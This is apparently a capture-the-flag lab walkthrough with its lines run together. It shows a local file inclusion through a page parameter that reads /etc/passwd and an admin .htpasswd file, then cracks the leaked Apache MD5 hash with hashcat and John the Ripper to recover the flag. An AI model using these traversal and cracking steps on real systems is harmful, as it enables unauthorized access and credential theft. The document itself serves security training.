Start the machine, hack the system, and find the hidden flags to complete this challenge and earn points!
This walkthrough explains how to hack the lab and capture the flags. For help with Learning Mode questions, use the Request Hint button next to each question.
?page=about?page=../../../etc/passwd to test for LFI (note: this will work because the else clause doesn't append .php)?page=admin/.htaccessAuthType Basic
AuthName "Admin Area"
AuthUserFile /var/www/html/admin/.htpasswd
Require valid-user?page=admin/.htpasswdadmin:$apr1$Ewv3fbgh$0ehlEITBv79FOVqbOtsoc/# Ubuntu/Debian:
sudo apt-get install hashcat
# macOS (with Homebrew):
brew install hashcat
# Windows:
# Download from https://hashcat.net/hashcat/# Ubuntu/Debian:
sudo apt-get install john
# macOS (with Homebrew):
brew install john
# Windows:
# Download from https://www.openwall.com/john/# Create a file with the hash
echo "admin:$apr1$Ewv3fbgh$0ehlEITBv79FOVqbOtsoc/" > hash.txt
# Use hashcat with Apache MD5 mode (-m 1600)
hashcat -m 1600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
# Or with a smaller wordlist for testing
hashcat -m 1600 -a 0 hash.txt /usr/share/wordlists/common_passwords.txt# Create a file with the hash
echo "admin:$apr1$Ewv3fbgh$0ehlEITBv79FOVqbOtsoc/" > hash.txt
# Use john with wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
# Or with a smaller wordlist for testing
john --wordlist=/usr/share/wordlists/common_passwords.txt hash.txt# You can also use online tools like crackstation.net
# Just paste the hash: $apr1$Ewv3fbgh$0ehlEITBv79FOVqbOtsoc/password123The flag is: password123
Choose how you want to get started
Choose a username to get started
We've sent a 9-character code to your email